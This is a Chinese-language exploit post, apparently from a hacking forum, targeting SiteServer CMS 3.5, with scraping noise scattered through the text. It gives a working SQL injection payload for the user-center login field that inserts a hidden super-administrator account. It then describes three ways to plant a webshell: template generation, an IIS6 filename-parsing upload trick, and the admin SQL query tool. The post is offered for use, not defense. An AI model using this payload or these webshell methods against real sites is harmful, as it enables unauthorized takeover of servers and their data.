经测试秒杀最新的3.5版
% ]4 M5 V, c! u1 U' y% vstieserver官网:www.siteserver.cn
t, C/ l& Q }9 xEXP:
- m5 c; N1 ]0 Q; p, J直接访问UserCenter/login.aspx0 u) M* `2 q/ U+ f
用户名处输入:. D4 U6 T/ A* U2 l0 ]6 L2 R
- T* }$ P4 P8 v" c7 v1 M: R
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–: j% m" b+ R9 k2 H* r5 k; p) _% ~
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。4 H# X0 h/ M. E2 B1 h0 ]3 s
之后再访问后台SiteServer/login.aspx用插入的用户登陆5 ^ |: J2 S1 o% O
后台拿webshell的三种方法:
2 V4 e% }3 m k7 H* l0 }- U% B2 t- V一、
( t% L& _) E- v2 G: c0 ~/ I站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx$ }5 F- d+ @* G/ E
二、! K7 j( D+ n3 D7 G: m
成员权限-》添加用户-》用户名为:1.asp. o( D( E) U" N! Y
http://127.0.0.1/usercenter/% ]5 D9 n! T" g: K& b8 j
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell- {: `. Q, R1 S: n8 a
(ps:后台添加用户时不会验证是否含有非法字符)+ J* a6 j$ j7 r+ _' X: C8 S
三、/ S6 O5 m7 N8 z+ m9 E, A
系统工具-》实用工具-》机器参数查看$ D1 c. f# m$ L7 K
可以看到数据库类型、名称,WEB路径2 _ ?9 d2 s! P! {: x7 m5 S. {
系统工具-》数据库工具-》SQL语句查询5 {, f0 o5 K: ^) O! D! x& `
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |